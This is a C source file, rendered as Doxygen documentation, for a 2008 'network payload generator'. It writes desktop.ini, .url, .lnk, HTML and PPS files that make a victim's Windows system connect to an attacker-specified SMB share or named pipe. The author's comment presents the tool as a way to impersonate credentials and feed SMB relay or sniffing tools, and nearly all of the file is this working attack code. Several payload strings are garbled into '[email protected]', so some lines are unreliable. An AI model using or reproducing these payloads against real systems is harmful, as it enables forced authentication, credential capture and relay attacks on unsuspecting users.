C:/Web/payload/payload.c

Go to the documentation of this file.
00001 /*
00002 Payload generator. Creates content that will force remote users to connect to the target network resource.
00003 If pointing to a network pipe ( \\hostname\pipe\mypipe ) user credentials can be impersonated.
00004 You can also point to a remote network share to force the computer that handles the payload to authenticate against
00005 the remote host. Then you can play with your favorite smbrelay/cain/misc sniffer
00006 
00007 For more information: http://www.tarasco.org/payload/index.html
00008 Author: Andres Tarasco - (c) 2006-2008
00009 
00010 Destination could be something like:
00011 
00012 * \\hostname\admin$
00013 * \\hostname\pipe\mypipe
00014 
00015 */
00016 #define _CRT_SECURE_NO_DEPRECATE
00017 #include <io.h>
00018 #include <stdio.h>
00019 #include <sys/stat.h>
00020 #include <windows.h>
00021 
00022 void           usage(void);
00023 void           banner(void);
00024 
00025 /*********************************************************************************/
00026 
00027 void banner(void)
00028 {
00029         printf("Force Network connections - payload generation\n");
00030         printf("Author: Andres Tarasco Acuna - (c) 2007-2008\n");
00031         printf("URL: http://www.tarasco.org\n\n");
00032 }
00033 
00034 void usage(void){
00035         printf("usage:\n");
00036         printf("payload.exe -t [d0|d1|d2|d3|d4|u|l|h|o] -d destination -p path\n");
00037 }
00038 /*********************************************************************************/
00039 
00040 int main(int argc, char **argv)
00041 {
00042 
00043         unsigned char IconHeader[76] = { 
00044                 0x4C, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 
00045                 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 
00046                 0x00, 0x00, 0x00, 0x46, 0xC0, 0x00, 0x00, 0x00, 
00047                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00048                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00049                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00050                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00051                 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
00052                 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00053                 0x00, 0x00, 0x00, 0x00
00054         };  
00055         char *type;
00056         char destination[512]="";
00057         char path[512]=".";
00058         char exploitcode[4096];
00059         char filename[512];
00060         DWORD read;
00061 
00062         HANDLE desktop;
00063         int i;
00064 
00065         banner();  
00066 
00067         for(i=1;i<argc;i++){
00068                 switch (argv[i][1]) {
00069                    case 't':
00070                            type=argv[i+1];                         
00071                            break;
00072                    case 'd':
00073                            strcpy(destination,argv[i+1]);
00074                            printf("destination: %s\n",destination);
00075                            break;
00076                    case 'p':
00077                            strcpy(path,argv[i+1]);
00078                            break;
00079                 }
00080                 i++;
00081         }
00082         if ( (*destination=='\0') || (*type=='\0') ) {
00083                 usage();
00084                 exit(1);
00085         }
00086 
00087         // Parseamos parametros
00088 
00089         if (*path!='.') 
00090         {
00091                 _mkdir(path);
00092         }
00093 
00094         switch(type[0]) //[d1|d2|d3|d4|u|l|h|o]
00095         {
00096         case 'd': // DESKTOP.INI
00097                 switch(type[1])
00098                 {
00099                 case '0':
00100                         sprintf(exploitcode,"[.ShellClassInfo]\r\nInfoTip=Proof_Of_Concept_Exploit0\r\n"
00101                                 "IconFile=%s\r\nIconIndex=-666\r\n"
00102                                 "[email protected]%s,-1\r\n"
00103                                 "[email protected]%s,-1\r\n"
00104                                 "[email protected]%s,-1\r\n"
00105                                 "ConfirmFileOp=0\r\n",destination,destination,destination,destination);
00106                         break;
00107 
00108                 case '1': //Iconfile parameter
00109                         //Se ejecuta al acceder a una subcarpeta
00110                         sprintf(exploitcode,"[.ShellClassInfo]\r\nInfoTip=Proof_Of_Concept_Exploit0\r\nIconFile=%s\r\nIconIndex=-666\r\nConfirmFileOp=0\r\n",destination);
00111                         break;
00112                 case '2': // [email protected]\\path
00113                         //Al dejarlo en una subcarpeta, se ejecuta.
00114                         //Funciona tb con los USBS
00115                         sprintf(exploitcode,"[.ShellClassInfo]\r\nInfoTip=Proof_Of_Concept_Exploit1\r\[email protected]%s,-1\r\nIconIndex=-666\r\nConfirmFileOp=0\r\n",destination);
00116                         break;
00117                 case '3': //InInfoTip
00118                         //Al seleccionar la carpeta
00119                         //Al dejarlo en el raiz en un disco USB se carga el pipe
00120                         sprintf(exploitcode,"[.ShellClassInfo]\r\[email protected]%s,-1\r\nIconIndex=-666\r\nConfirmFileOp=0\r\n",destination);
00121                         break;
00122                 case '4': //desktop.ini
00123                         //Al entrar en la carpeta.
00124                         sprintf(exploitcode,"[LocalizedFileNames]\r\[email protected]%s,-1\r\n",destination);
00125                         break;
00126                 default:
00127                         usage();
00128                         exit(1);
00129                         break;
00130                 }
00131                 strcat(path,"\\desktop.ini");
00132                 printf("Opening: %s\n",path);
00133                 desktop=CreateFile(path,GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, CREATE_ALWAYS, 0, NULL);
00134                 if (desktop!=INVALID_HANDLE_VALUE) 
00135                 {
00136                         WriteFile(desktop, exploitcode, strlen(exploitcode), (DWORD *)&read, NULL);
00137                         CloseHandle(desktop);
00138                 }
00139                 break;
00140 
00141         case 'u': //URL FILE
00142                 strcat(path,"\\payload.url");
00143                 sprintf(exploitcode,
00144                         "[DEFAULT]\r\n"
00145                         "BASEURL=http://www.tarasco.org\r\n"
00146                         "[InternetShortcut]\r\n"
00147                         "URL=http://www.tarasco.org\r\n"
00148                         "Modified=203BF2701D7FC60120\r\n"
00149                         "IconIndex=3\r\n"
00150                         "IconFile=%s\r\n",destination);       
00151                 desktop=CreateFile(path,GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, CREATE_ALWAYS, 0, NULL);
00152                 if (desktop!=INVALID_HANDLE_VALUE) 
00153                 {
00154                         WriteFile(desktop, exploitcode, strlen(exploitcode), (DWORD *)&read, NULL);
00155                         CloseHandle(desktop);
00156                 }       
00157                 break;
00158         case 'l': //LNK FILE - For more information http://www.514.es/html/forensic
00159                 strcat(path,"\\payload.lnk");
00160                 printf("Opening: %s\n",path);
00161                 desktop=CreateFile(path,GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, CREATE_ALWAYS, 0, NULL);
00162                 if (desktop!=INVALID_HANDLE_VALUE) 
00163                 {
00164                         char tmp[512];
00165                         WriteFile(desktop, IconHeader, 76, (DWORD *)&read, NULL);
00166                         strcpy(exploitcode,destination);
00167                         memset(tmp,0,sizeof(tmp));
00168                         tmp[0]=strlen(exploitcode);
00169                         tmp[1]=0x00;
00170                         for(i=0;i<strlen(exploitcode);i++) {
00171                                 tmp[i*2+2]=exploitcode[i];
00172                                 tmp[i*2+3]=0x00;
00173                         }
00174                         WriteFile(desktop, tmp, (strlen(exploitcode)*2)+6, (DWORD *)&read, NULL);
00175                         CloseHandle(desktop);
00176                 }
00177                 break;
00178         case 'h': //http://www.w3.org/TR/html4/struct/links.html#h-12.3
00179                 strcat(path,"\\payload.html");
00180                 printf("Abriendo fichero: %s\n",path);
00181                 desktop=CreateFile(path,GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, CREATE_ALWAYS, 0, NULL);
00182                 if (desktop!=INVALID_HANDLE_VALUE) 
00183                 {
00184                         sprintf(exploitcode,"<html><head></head>\r\n"
00185                                 "<LINK REL=\"stylesheet\" HREF=\"res://%s\" type=\"text/css\">\r\n</html>",destination);
00186                         WriteFile(desktop, exploitcode, strlen(exploitcode), (DWORD *)&read, NULL);
00187                         CloseHandle(desktop);
00188                 }
00189                 break;
00190         case 'o': //PPS/DOC/XLS/XLD/DOT/RTF
00191                 strcat(path,"\\payload.pps");
00192                 printf("Abriendo fichero: %s\n",path);
00193                 desktop=CreateFile(path,GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, CREATE_ALWAYS, 0, NULL);
00194                 if (desktop!=INVALID_HANDLE_VALUE) 
00195                 {
00196                         sprintf(exploitcode,"<html><head></head>\r\n"
00197                                 "<LINK REL=\"stylesheet\" HREF=\"file://%s\" type=\"text/css\">\r\n"
00198                                 "<b>Pr00f 0f c0nc3p7</b></html>",destination);
00199                         WriteFile(desktop, exploitcode, strlen(exploitcode), (DWORD *)&read, NULL);
00200                         CloseHandle(desktop);
00201                 }
00202                 break;
00203         default:
00204                 printf("[+] Unknown parameter -t %i\n",type);
00205                 exit(1);
00206                 break;
00207         }
00208 
00209 }
00210 /*********************************************************************************/
00211 
00212 
00213 
00214 

Generated on Mon Feb 25 09:46:17 2008 for Network payload generator by  doxygen 1.5.4